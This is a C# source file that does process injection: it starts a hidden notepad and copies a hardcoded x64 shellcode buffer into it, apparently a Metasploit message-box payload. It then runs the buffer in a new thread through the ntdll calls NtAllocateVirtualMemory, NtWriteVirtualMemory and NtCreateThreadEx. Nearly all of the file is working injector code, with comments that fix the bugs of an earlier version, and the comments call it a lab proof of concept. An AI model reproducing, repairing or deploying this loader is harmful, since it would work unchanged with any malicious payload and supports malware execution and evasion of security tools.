using System.Diagnostics;
using System;
using System.Runtime.InteropServices;
namespace gigas;
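public class ProcInj
{
    // NTSTATUS values: STATUS_SUCCESS is 0 and every failure is negative, so the
    // original `!= IntPtr.Zero` test on the NtCreateThreadEx result treated a
    // successful call as a failure. Every Nt* call below is checked via NtSuccess().
    private const uint MEM_COMMIT = 0x00001000;
    private const uint MEM_RESERVE = 0x00002000;
    private const uint PAGE_EXECUTE_READWRITE = 0x40;
    private const uint THREAD_ALL_ACCESS = 0x1FFFFF;

    // Upper bound on how long NotepadStart() waits for the payload to end the child.
    // The original called WaitForExit() with no timeout on a hidden notepad, which
    // blocked the caller forever whenever the payload did not run.
    private const int PayloadTimeoutMs = 30_000;

    // Prototypes follow the ntdll signatures (the NtCreateThreadEx prototype pasted
    // below is the one this file already carried). Nt* routines return NTSTATUS and
    // do not set the Win32 last error, so SetLastError is not used.
    //
    // The original declarations could not work as written:
    //  - NtAllocateVirtualMemory takes BaseAddress and RegionSize *by pointer* and
    //    returns NTSTATUS, not the allocated address (the old code then used that
    //    status as the write/thread-start address);
    //  - NtWriteVirtualMemory has no ZeroBits parameter;
    //  - NtCreateThreadEx's first parameter is an out ThreadHandle, which was missing.
    [DllImport("ntdll.dll", ExactSpelling = true)]
    private static extern int NtAllocateVirtualMemory(
        IntPtr ProcessHandle,
        ref IntPtr BaseAddress,   // PVOID*  — NULL on input lets the kernel pick the address
        UIntPtr ZeroBits,
        ref UIntPtr RegionSize,   // PSIZE_T — in/out, rounded up to a page on return
        uint AllocationType,
        uint Protect);

    [DllImport("ntdll.dll", ExactSpelling = true)]
    private static extern int NtWriteVirtualMemory(
        IntPtr ProcessHandle,
        IntPtr BaseAddress,
        byte[] Buffer,
        UIntPtr NumberOfBytesToWrite,
        out UIntPtr NumberOfBytesWritten);

    /*
     * NtCreateThreadEx(
     *   _Out_ PHANDLE ThreadHandle,
     *   _In_ ACCESS_MASK DesiredAccess,
     *   _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
     *   _In_ HANDLE ProcessHandle,
     *   _In_ PUSER_THREAD_START_ROUTINE StartRoutine,
     *   _In_opt_ PVOID Argument,
     *   _In_ ULONG CreateFlags,          // THREAD_CREATE_FLAGS_*
     *   _In_ SIZE_T ZeroBits,
     *   _In_ SIZE_T StackSize,
     *   _In_ SIZE_T MaximumStackSize,
     *   _In_opt_ PPS_ATTRIBUTE_LIST AttributeList)
     */
    [DllImport("ntdll.dll", ExactSpelling = true)]
    private static extern int NtCreateThreadEx(
        out IntPtr ThreadHandle,
        uint DesiredAccess,
        IntPtr ObjectAttributes,
        IntPtr ProcessHandle,
        IntPtr StartRoutine,
        IntPtr Argument,
        uint CreateFlags,
        UIntPtr ZeroBits,
        UIntPtr StackSize,
        UIntPtr MaximumStackSize,
        IntPtr AttributeList);

    [DllImport("ntdll.dll", ExactSpelling = true)]
    private static extern int NtClose(IntPtr Handle);

    /// <summary>
    /// Raw payload copied into the target and run on a new thread.
    /// The leading bytes carry a REX.W prefix (`48 81 e4` = and rsp, imm32), so this
    /// is x64 code and only runs from a 64-bit injector into a 64-bit target. The
    /// trailing bytes are the ASCII strings "Hello, from MSF!", "Error!" and
    /// "user32.dll", consistent with a Metasploit message-box payload — not verified
    /// here beyond those strings. Kept public/mutable for compatibility; callers
    /// should treat it as read-only.
    /// </summary>
    public static readonly byte[] Buf = new byte[]
    {
        0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
        0x51, 0x56,
        0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b, 0x52, 0x20,
        0x3e, 0x48,
        0x8b, 0x72, 0x50, 0x3e, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61,
        0x7c, 0x02,
        0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52,
        0x20, 0x3e,
        0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x6f,
        0x48, 0x01,
        0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x5c, 0x48, 0xff,
        0xc9, 0x3e, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1,
        0xc9, 0x0d, 0x41, 0x01,
        0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x3e, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd6, 0x58, 0x3e,
        0x44, 0x8b,
        0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x3e, 0x41, 0x8b, 0x0c, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01,
        0xd0, 0x3e,
        0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
        0x41, 0x5a,
        0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12, 0xe9, 0x49,
        0xff, 0xff,
        0xff, 0x5d, 0x3e, 0x48, 0x8d, 0x8d, 0x26, 0x01, 0x00, 0x00, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5,
        0x49, 0xc7,
        0xc1, 0x00, 0x00, 0x00, 0x00, 0x3e, 0x48, 0x8d, 0x95, 0x0e, 0x01, 0x00, 0x00, 0x3e, 0x4c, 0x8d, 0x85, 0x1f,
        0x01, 0x00,
        0x00, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83, 0x56, 0x07, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0x41, 0xba, 0xf0,
        0xb5, 0xa2,
        0x56, 0xff, 0xd5, 0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x2c, 0x20, 0x66, 0x72, 0x6f, 0x6d, 0x20, 0x4d, 0x53, 0x46,
        0x21, 0x00,
        0x45, 0x72, 0x72, 0x6f, 0x72, 0x21, 0x00, 0x75, 0x73, 0x65, 0x72, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00
    };

    /// <summary>
    /// Entry point: starts a hidden notepad, injects <see cref="Buf"/> into it and
    /// reports the outcome on the console.
    /// </summary>
    /// <remarks>
    /// Success is tied to the injection result (see <see cref="NotepadStart"/>),
    /// not to the child's exit code. The original treated exit code 1 as success;
    /// nothing in this file establishes that the payload exits with 1, so that
    /// coupling was dropped.
    /// </remarks>
    public static void ProcStart()
    {
        int inject = NotepadStart();
        if (inject >= 0)
        {
            Console.WriteLine("process injection complete");
        }
        else
        {
            // "{0}" — the original used "{}", which makes string.Format throw FormatException.
            Console.WriteLine("Process injection incomplete, notepad exitCode: {0}", inject);
        }
    }

    /// <summary>
    /// Launches a hidden notepad, injects into that one process and waits for it.
    /// </summary>
    /// <returns>
    /// The child's exit code when injection succeeded and the child exited within
    /// <see cref="PayloadTimeoutMs"/>; -1 when no process was created, injection
    /// failed, or the child had to be killed after the timeout.
    /// </returns>
    private static int NotepadStart()
    {
        var start = new ProcessStartInfo
        {
            FileName = "C:\\Windows\\System32\\notepad.exe",
            WindowStyle = ProcessWindowStyle.Hidden,
            CreateNoWindow = true,
        };

        using (Process proc = Process.Start(start))
        {
            if (proc is null)
            {
                return -1; // Process.Start may return null when no new process was created
            }

            // The original injected immediately after CreateProcess, before the child's
            // loader had necessarily finished. Best-effort wait for its message loop;
            // notepad is a GUI app so this normally returns quickly.
            try
            {
                proc.WaitForInputIdle(5000);
            }
            catch (InvalidOperationException)
            {
                // No GUI thread (or already gone) — fall through and attempt anyway.
            }

            if (!Injector(proc))
            {
                TryKill(proc); // don't leave a hidden notepad behind
                return -1;
            }

            if (!proc.WaitForExit(PayloadTimeoutMs))
            {
                // The payload did not end the child; do not hang the caller forever.
                TryKill(proc);
                return -1;
            }

            return proc.ExitCode;
        }
    }

    /// <summary>Best-effort termination of a child we started; swallows only "already exited".</summary>
    private static void TryKill(Process proc)
    {
        try
        {
            if (!proc.HasExited)
            {
                proc.Kill();
                proc.WaitForExit();
            }
        }
        catch (Exception ex) when (ex is InvalidOperationException || ex is System.ComponentModel.Win32Exception)
        {
            // Already gone or not killable from here — nothing more to clean up.
        }
    }

    /// <summary>
    /// Injects into exactly the process we started.
    /// </summary>
    /// <remarks>
    /// The original enumerated every "notepad" process on the machine and injected
    /// into all of them — including any the user had open — and discarded the result.
    /// </remarks>
    /// <param name="target">The child created by <see cref="NotepadStart"/>.</param>
    /// <returns>True when every injection step reported success.</returns>
    private static bool Injector(Process target)
    {
        if (target is null)
        {
            throw new ArgumentNullException(nameof(target));
        }

        // Process.Handle is the handle .NET opened for the child. It is assumed to carry
        // PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD — confirm if
        // injection fails with STATUS_ACCESS_DENIED.
        return UnsfInj(target.Handle);
    }

    /// <summary>
    /// Allocates an RWX region in the target, copies <see cref="Buf"/> into it and
    /// starts a thread at its base.
    /// </summary>
    /// <param name="h">A process handle with VM-operation, VM-write and create-thread rights.</param>
    /// <returns>True when allocation, write and thread creation all succeeded.</returns>
    /// <remarks>
    /// Each step's NTSTATUS is checked; the partial write case (fewer bytes written than
    /// requested) is treated as failure. A failed write or thread creation leaves the
    /// region mapped in the child; the caller kills the child in that case.
    /// </remarks>
    static bool UnsfInj(IntPtr h)
    {
        static bool Fail()
        {
            Console.Write("injection failed");
            return false;
        }

        // The payload is x64 code (see Buf); a 32-bit injector cannot run it.
        if (h == IntPtr.Zero || !Environment.Is64BitProcess)
        {
            return Fail();
        }

        IntPtr baseAddr = IntPtr.Zero;                        // NULL in: let the kernel choose
        UIntPtr regionSize = new UIntPtr((uint)Buf.Length);   // rounded up to a page by the kernel

        // RWX mapping in the remote process, as in the original; fine for a lab PoC.
        int status = NtAllocateVirtualMemory(h, ref baseAddr, UIntPtr.Zero, ref regionSize,
                                             MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
        if (!NtSuccess(status) || baseAddr == IntPtr.Zero)
        {
            return Fail();
        }

        status = NtWriteVirtualMemory(h, baseAddr, Buf, new UIntPtr((uint)Buf.Length), out UIntPtr written);
        if (!NtSuccess(status) || written.ToUInt64() != (ulong)Buf.Length)
        {
            return Fail();
        }

        status = NtCreateThreadEx(out IntPtr thread, THREAD_ALL_ACCESS, IntPtr.Zero, h, baseAddr,
                                  IntPtr.Zero, 0, UIntPtr.Zero, UIntPtr.Zero, UIntPtr.Zero, IntPtr.Zero);
        if (!NtSuccess(status))
        {
            return Fail();
        }

        NtClose(thread); // the thread handle is never used again; don't leak it
        Console.Write("injection complete!");
        return true;
    }

    /// <summary>NT_SUCCESS: non-negative NTSTATUS values (0 = STATUS_SUCCESS) are success.</summary>
    private static bool NtSuccess(int status) => status >= 0;
}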